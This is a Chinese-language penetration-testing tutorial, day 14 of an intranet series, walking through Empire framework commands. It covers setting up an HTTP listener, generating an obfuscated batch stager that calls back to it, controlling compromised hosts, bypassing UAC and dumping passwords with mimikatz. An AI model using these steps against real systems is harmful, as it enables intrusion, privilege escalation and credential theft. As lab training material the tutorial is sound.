內網滲透 day14-empire基礎命令的使用

empire的基礎操做

1. 創建監聽器

help    查看幫助命令html

wps1

listeners     查看監聽器shell

wps2

uselistener  xxx     使用監聽器模塊windows

經常使用的監聽模塊:httpspa

按兩次tab鍵查看能使用的監聽器模塊3d

wps3

wps4

info    查看參數信息htm

wps5

設置參數blog

set Name xxxget

wps6

set Host http://xxxit

wps7

set Port xxx基礎

wps8

wps9

執行:execute

wps10

main 返回主菜單

這邊顯示目前有一個活躍的監聽器

wps11

2. 設置stagers

usestagers xxx   使用stager模塊

經常使用的模塊:windows/hta、windows/launcher_bat

按兩次tab鍵查看能使用的stager模塊

wps12

wps13

info  查看要設置的參數

wps14

set Listener xx     設置監聽器

wps15

set OutFile /var/www/html/launcher.bat 設置文件生成路勁

wps16

delete   木馬運行完是否自動刪除

Obfuscate(混淆)

wps17

execute 執行

wps18

在靶機上雙擊bat文件成功反彈會話

wps19

3. 用戶交互

agents 切換到用戶列表

wps20

list 列出用戶

wps21

rename 修改用戶ID的名字

wps22

interact 進入到用戶交互界面

wps23

sysinfo     查看系統信息

wps24

sc  截屏

wps25

wps26

searchmodule 搜索模塊

wps27

shell + command 執行命令

wps28

spawn 遷移到新的用戶須要指定監聽器的名字

wps29

wps30

產生了一個新的會話

wps31

用戶清除:

kill agents | all

wps32

監聽器清除:

kill listener | all

wps33

4. 提權

繞過uac

bypassuac  <listener>      bypassuac繞過uac提權

wps34

能夠看到產生了一個帶*的會話,提權成功用戶名前面會多一個*號

wps35

mimikatz      在擁有權限後能夠利用mimikatz獲取用戶帳號密碼

wps36

creds         以列表的形式顯示mimikatz獲取的帳號密碼

wps37

uac提權(須要手動確認)

searchmodule ask 搜索ask模塊

wps38

usemodule privesc/ask       使用privesc/ask模塊

wps39

info    查看所需參數

wps40

設置監聽器

wps41

run   執行

wps42

靶機彈出uac認證框

wps43

列表中產生新的管理員會話

wps44

相關文章
相關標籤/搜索